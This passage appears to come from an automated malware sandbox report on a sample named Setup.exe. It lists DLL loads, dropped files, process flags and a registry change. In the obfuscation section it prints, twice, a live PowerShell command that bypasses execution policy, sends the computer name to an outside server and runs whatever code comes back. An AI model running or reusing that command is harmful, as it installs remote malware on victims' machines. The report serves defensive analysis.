        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: rstrtmgr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wtsapi32.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: winsta.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: textinputframework.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: coreuicomponents.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: shfolder.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: rstrtmgr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: textshaping.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: sfc.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: sfc_os.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: explorerframe.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: dlnashext.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wpdshext.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: edputil.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: appresolver.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: bcp47langs.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: slc.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: sppc.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: onecorecommonproxystub.dll
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
        Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
        Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
        Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
        Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
        Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
        Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wsock32.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winmm.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: iconcodecservice.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windowscodecs.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: textshaping.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winhttp.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: twinui.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: powrprof.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: pdh.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: umpdc.dll
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: shdocvw.dll
        Source: C:\Users\user\Desktop\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpWindow found: window name: TMainForm
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: Setup.exeStatic file information: File size 73424035 > 1048576
        Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2553928268.0000000002699000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb| source: powershell.exe, 00000011.00000002.2558541712.0000000006EC5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbT\ source: powershell.exe, 00000011.00000002.2558473325.0000000006E7A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ilit.pdb source: powershell.exe, 00000011.00000002.2558541712.0000000006EC5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2558541712.0000000006EC5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000031.00000002.3131750928.000000003884C000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000031.00000002.3131874592.0000000038BA0000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000031.00000002.3131750928.000000003884C000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000031.00000002.3131874592.0000000038BA0000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2553928268.0000000002699000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Suspicious powershell command line found
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Jump to behavior
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drStatic PE information: real checksum: 0x9307ce should be: 0x8615ed
        Source: T0VC3MU5SNNFXQB43V5.tmp.21.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
        Source: T0VC3MU5SNNFXQB43V5.tmp.19.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drStatic PE information: section name: .didata
        Source: T0VC3MU5SNNFXQB43V5.tmp.19.drStatic PE information: section name: .didata
        Source: T0VC3MU5SNNFXQB43V5.tmp.21.drStatic PE information: section name: .didata
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_04192C1F push esp; ret 17_2_04192C39
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_04193655 push ebx; iretd 17_2_041936DA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_04193645 push ebx; iretd 17_2_041936DA

        Persistence and Installation Behavior

        barindex
        Drops PE files with a suspicious file extension
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IRCRU.tmp\_isetup\_isdecmp.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-320VG.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-320VG.tmp\_isetup\_isdecmp.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-STFPD.tmpJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IRCRU.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comFile created: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeFile created: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeFile created: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpJump to dropped file
        Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
